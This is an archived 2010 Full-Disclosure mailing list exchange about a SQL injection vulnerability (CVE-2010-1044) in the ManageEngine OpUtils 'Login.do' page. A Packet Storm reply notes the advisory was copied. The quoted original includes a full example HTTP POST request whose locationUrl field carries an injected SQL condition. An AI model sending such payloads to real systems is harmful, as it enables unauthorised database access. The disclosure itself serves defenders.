lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <20100918195458.GD4551@packetstormsecurity.org>
Date: Sat, 18 Sep 2010 15:54:58 -0400
From: Packet Storm <packet@...ketstormsecurity.org>
To: information security <informationhacker08@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: ManageEngine OpUtils 'Login.do' SQL	Injection
	Vulnerability

Copied.

http://packetstormsecurity.org/1002-exploits/oputils_5-sql.txt ab4dbe3b908d1e7283e0f2d25720467e ManageEngine OpUtils 5 suffers from a remote SQL injection vulnerability in Login.DO. Authored By Asheesh Kumar Mani Tripathi


On Sat, Sep 18, 2010 at 10:33:11PM +0530, information security wrote:
> http://www.cvedetails.com/cve/CVE-2010-1044/20101044-vulnerable-softwares-references-exploits.html#references
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1044
> 
> ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability
> 
> Attackers can use a browser to exploit this issue.
> 
> The following example POST request is available:
> 
> POST /Login.do HTTP/1.1 Host: localhost:7080 User-Agent: Mozilla/5.0
> (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
> (.NET CLR 3.5.30729) Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115
> Proxy-Connection: keep-alive Referer:
> http://www.example.com/Login.doCookie:
> JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
> Content-Type: application/x-www-form-urlencoded Content-Length: 136
> cookieexists=true&amp;username=asheesh&amp;password=asheesh&amp;logonsubmit=+&amp;log=WARNING&amp;locationUrl=localhost&amp;isHttpPort=false"+and+31337-31337="0

> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ